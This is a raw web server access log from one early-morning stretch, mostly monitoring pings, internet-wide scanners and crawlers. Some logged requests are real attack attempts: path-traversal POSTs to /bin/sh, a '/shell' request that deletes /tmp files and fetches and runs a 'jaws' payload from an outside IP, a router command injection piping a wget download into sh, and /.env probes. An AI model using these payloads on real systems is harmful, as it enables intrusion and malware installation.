47.76.247.122 - - [03/Sep/2024:02:41:39 +0200] "GET /maxigas/pick/painting/gargoyle-notre_dame.jpg HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_11) AppleWebKit/568.7 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/568.7 Edg/105.0.5363.50"
212.95.49.158 - - [03/Sep/2024:02:41:41 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:02:41:41 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:02:41:42 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:02:41:42 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
8.218.207.229 - - [03/Sep/2024:02:42:05 +0200] "GET /maxigas/pick/painting/gargoyle-notre_dame.jpg HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/583.11 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/583.11 Edg/105.0.3317.68"
8.218.28.6 - - [03/Sep/2024:02:42:14 +0200] "GET /maxigas/pick/painting/gargoyle-notre_dame.jpg HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_9) AppleWebKit/594.1 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/594.1 Edg/105.0.1539.57"
195.56.55.225 - - [03/Sep/2024:02:42:14 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
167.94.146.48 - - [03/Sep/2024:02:42:29 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
167.94.146.48 - - [03/Sep/2024:02:42:33 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.48 - - [03/Sep/2024:02:42:33 +0200] "GET /favicon.ico HTTP/1.1" 404 287 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.48 - - [03/Sep/2024:02:42:33 +0200] "PRI * HTTP/2.0" 400 373 "-" "-"
195.56.55.225 - - [03/Sep/2024:02:44:17 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:02:46:20 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [03/Sep/2024:02:47:34 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.pzk.zpok.hu/owa/ HTTP/1.1" 404 297 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:02:47:35 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [03/Sep/2024:02:48:24 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [03/Sep/2024:02:50:18 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:02:50:19 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [03/Sep/2024:02:50:27 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
198.235.24.11 - - [03/Sep/2024:02:51:11 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [03/Sep/2024:02:52:30 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
205.210.31.88 - - [03/Sep/2024:02:53:24 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [03/Sep/2024:02:54:33 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:02:56:36 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:02:58:41 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:03:00:44 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:03:02:47 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
198.235.24.238 - - [03/Sep/2024:03:04:06 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
205.210.31.175 - - [03/Sep/2024:03:04:15 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [03/Sep/2024:03:04:50 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:03:06:53 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:03:08:56 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
198.235.24.126 - - [03/Sep/2024:03:09:38 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [03/Sep/2024:03:10:59 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
17.241.219.166 - - [03/Sep/2024:03:11:04 +0200] "GET /robots.txt HTTP/1.1" 404 287 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.241.219.166 - - [03/Sep/2024:03:11:04 +0200] "GET /favicon.ico HTTP/1.1" 404 288 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
195.56.55.225 - - [03/Sep/2024:03:13:02 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
89.190.156.137 - - [03/Sep/2024:03:13:55 +0200] "GET / HTTP/1.0" 200 1155 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
195.56.55.225 - - [03/Sep/2024:03:15:05 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
205.210.31.83 - - [03/Sep/2024:03:16:29 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.95.49.158 - - [03/Sep/2024:03:17:03 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.jpic.zpok.hu/owa/ HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:03:17:03 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [03/Sep/2024:03:17:09 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.191.126.213 - - [03/Sep/2024:03:17:35 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
192.44.68.160 - - [03/Sep/2024:03:18:10 +0200] "GET /sziget/demok/minimal_project7.wma HTTP/1.1" 404 306 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
61.142.85.157 - - [03/Sep/2024:03:18:51 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 403 "-" "Custom-AsyncHttpClient"
61.142.85.157 - - [03/Sep/2024:03:18:52 +0200] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 297 "-" "Custom-AsyncHttpClient"
195.56.55.225 - - [03/Sep/2024:03:19:14 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
61.142.85.157 - - [03/Sep/2024:03:19:26 +0200] "-" 408 - "-" "-"
54.36.148.197 - - [03/Sep/2024:03:20:01 +0200] "GET /robots.txt HTTP/1.1" 404 286 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
195.56.55.225 - - [03/Sep/2024:03:21:17 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:03:23:21 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:03:25:25 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
205.210.31.52 - - [03/Sep/2024:03:26:51 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [03/Sep/2024:03:27:28 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:03:29:31 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
198.235.24.207 - - [03/Sep/2024:03:31:32 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [03/Sep/2024:03:31:34 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
197.33.253.7 - - [03/Sep/2024:03:32:19 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.145.165.64/jaws;sh+/tmp/jaws HTTP/1.1" 400 365 "-" "-"
149.50.103.48 - - [03/Sep/2024:03:32:49 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [03/Sep/2024:03:33:38 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:03:35:41 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:03:37:44 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:03:39:47 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:03:41:50 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
91.233.21.70 - - [03/Sep/2024:03:43:18 +0200] "GET /.well-known/acme-challenge/H52K736A9H4NRED8N_1PJBSZPYDY_5AS HTTP/1.1" 404 335 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [03/Sep/2024:03:43:18 +0200] "GET /.well-known/acme-challenge/9EOWIJJTZ1PE0UZBTLPQHGIZTFELZDEJ HTTP/1.1" 404 337 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [03/Sep/2024:03:43:18 +0200] "GET /.well-known/acme-challenge/B7SJFEMYO85N9E2C-X7P98CF23K92E49 HTTP/1.1" 404 338 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [03/Sep/2024:03:43:18 +0200] "GET /.well-known/acme-challenge/J269083Z0DR5QHEJQJRTDXG9E2ZIYSTQ HTTP/1.1" 404 338 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [03/Sep/2024:03:43:19 +0200] "GET /.well-known/acme-challenge/2Q6RAQV2BI_IYUGMHPS8O-FQPMPTZ_NS HTTP/1.1" 404 341 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [03/Sep/2024:03:43:19 +0200] "GET /.well-known/acme-challenge/3BCZ2TZJA99C826CIJSFH0ZAS6ZVCVTE HTTP/1.1" 404 342 "-" "Cpanel-HTTP-Client/1.0"
195.56.55.225 - - [03/Sep/2024:03:43:53 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:03:45:56 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:03:47:59 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
147.185.132.219 - - [03/Sep/2024:03:48:59 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [03/Sep/2024:03:50:02 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
89.190.156.137 - - [03/Sep/2024:03:50:08 +0200] "GET / HTTP/1.0" 200 1155 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
87.247.158.15 - - [03/Sep/2024:03:51:39 +0200] "\x03" 501 - "-" "-"
195.56.55.225 - - [03/Sep/2024:03:52:05 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
173.252.83.45 - - [03/Sep/2024:03:53:23 +0200] "GET /robots.txt HTTP/1.1" 404 285 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
195.56.55.225 - - [03/Sep/2024:03:54:08 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
80.82.77.202 - - [03/Sep/2024:03:54:42 +0200] "\x16\x03\x02\x01o\x01" 501 - "-" "-"
195.56.55.225 - - [03/Sep/2024:03:56:11 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
149.50.103.48 - - [03/Sep/2024:03:56:18 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [03/Sep/2024:03:58:14 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:04:00:17 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
205.210.31.66 - - [03/Sep/2024:04:00:37 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
167.253.34.3 - - [03/Sep/2024:04:02:06 +0200] "GET /robots.txt HTTP/1.0" 404 283 "-" "Mozilla/4.0 (compatible; fluid/0.0; +http://www.leak.info/bot.html)"
195.56.55.225 - - [03/Sep/2024:04:02:21 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
147.185.132.115 - - [03/Sep/2024:04:02:48 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [03/Sep/2024:04:04:24 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:04:06:27 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:04:08:30 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.191.126.213 - - [03/Sep/2024:04:08:59 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [03/Sep/2024:04:10:33 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:04:12:36 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:04:14:40 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
17.241.219.254 - - [03/Sep/2024:04:16:28 +0200] "GET /robots.txt HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.241.219.254 - - [03/Sep/2024:04:16:28 +0200] "GET /favicon.ico HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
185.224.128.84 - - [03/Sep/2024:04:16:38 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%2Ft%7Csh%3B%60) HTTP/1.1" 404 302 "-" "Go-http-client/1.1"
195.56.55.225 - - [03/Sep/2024:04:16:43 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:04:18:45 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [03/Sep/2024:04:19:18 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:04:19:19 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
185.191.126.213 - - [03/Sep/2024:04:19:25 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [03/Sep/2024:04:20:49 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [03/Sep/2024:04:21:07 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:04:21:07 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
95.214.55.138 - - [03/Sep/2024:04:22:46 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
195.56.55.225 - - [03/Sep/2024:04:22:53 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:04:24:57 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
89.190.156.137 - - [03/Sep/2024:04:25:44 +0200] "GET / HTTP/1.0" 200 1155 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
172.169.190.120 - - [03/Sep/2024:04:26:24 +0200] "GET /druid/index.html HTTP/1.1" 404 292 "-" "Mozilla/5.0 zgrab/0.x"
172.169.190.120 - - [03/Sep/2024:04:26:33 +0200] "GET /druid/index.html HTTP/1.1" 404 292 "-" "Mozilla/5.0 zgrab/0.x"
195.56.55.225 - - [03/Sep/2024:04:27:00 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:04:29:03 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
147.185.132.213 - - [03/Sep/2024:04:29:38 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [03/Sep/2024:04:31:06 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
198.235.24.212 - - [03/Sep/2024:04:31:52 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
89.190.156.137 - - [03/Sep/2024:04:32:41 +0200] "GET / HTTP/1.0" 200 1155 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
195.56.55.225 - - [03/Sep/2024:04:33:09 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
95.214.55.138 - - [03/Sep/2024:04:34:43 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
195.56.55.225 - - [03/Sep/2024:04:35:12 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:04:37:15 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:04:39:18 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:04:41:21 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:04:43:24 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.89.13 - - [03/Sep/2024:04:44:08 +0200] "GET / HTTP/1.1" 200 1155 "-" "FeedFetcher-Google; (+http://www.google.com/feedfetcher.html)"
195.56.55.225 - - [03/Sep/2024:04:45:28 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [03/Sep/2024:04:45:38 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.goncol.zpok.hu/owa/ HTTP/1.1" 404 300 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:04:45:39 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [03/Sep/2024:04:47:35 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:04:49:38 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
80.82.77.202 - - [03/Sep/2024:04:49:39 +0200] "GET / HTTP/1.0" 200 1155 "-" "grub-client-1.5.3; (grub-client-1.5.3; Crawl your own stuff with http://grub.org)"
17.241.227.71 - - [03/Sep/2024:04:50:21 +0200] "GET /robots.txt HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.241.227.71 - - [03/Sep/2024:04:50:22 +0200] "GET /favicon.ico HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
212.95.49.158 - - [03/Sep/2024:04:50:25 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.levego.zpok.hu/owa/ HTTP/1.1" 404 300 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:04:50:26 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [03/Sep/2024:04:51:41 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:04:53:44 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.224.128.84 - - [03/Sep/2024:04:54:41 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%2Ft%7Csh%3B%60) HTTP/1.1" 404 302 "-" "Go-http-client/1.1"
195.56.55.225 - - [03/Sep/2024:04:55:47 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [03/Sep/2024:04:55:54 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:04:55:55 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
205.210.31.55 - - [03/Sep/2024:04:57:29 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [03/Sep/2024:04:57:50 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [03/Sep/2024:04:58:20 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.etk.zpok.hu/owa/ HTTP/1.1" 404 297 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:04:58:21 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
94.156.68.104 - - [03/Sep/2024:04:58:42 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; Android 9; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.80 Mobile Safari/537.36"
149.50.103.48 - - [03/Sep/2024:04:59:01 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
94.156.68.104 - - [03/Sep/2024:04:59:07 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; U; Android 1.6; en-us; SonyEricssonX10i Build/R1AA056) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1"
195.56.55.225 - - [03/Sep/2024:04:59:53 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:05:01:56 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
71.6.134.234 - - [03/Sep/2024:05:02:45 +0200] "\x16\x03\x01" 501 - "-" "-"
195.56.55.225 - - [03/Sep/2024:05:03:59 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
